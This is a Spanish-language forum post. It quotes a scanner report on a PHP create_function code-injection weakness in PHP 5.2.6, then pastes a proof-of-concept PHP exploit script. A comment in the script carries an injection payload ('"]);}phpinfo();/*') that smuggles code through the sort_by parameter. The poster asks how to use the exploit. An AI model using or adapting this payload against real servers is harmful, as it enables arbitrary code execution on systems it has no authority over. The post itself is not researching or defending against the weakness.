Código:
Web Servers : PHP create_function Code Injection Weakness
Port 80
Description PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.This weakness is reported in PHP 5.2.6; other versions may also be affected.
How to fix Upgrade to the current version of PHP.
Risk level High
Related Links PHP HomePage.
CVE CVE-MAP-NOMATCH
Bugtraq ID 31398
he buscado y tengo este explot en php
Código:
<?php
# call as test.php?sort_by="]);}phpinfo();/*
$sort_by=stripslashes($_GET[sort_by]);
$databases=array("test");
$sorter = 'var_dump';
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';
usort($databases, create_function('$a, $b', $sort_function));
?>
Alguien sabe como lo puedo utilizar?
Gracias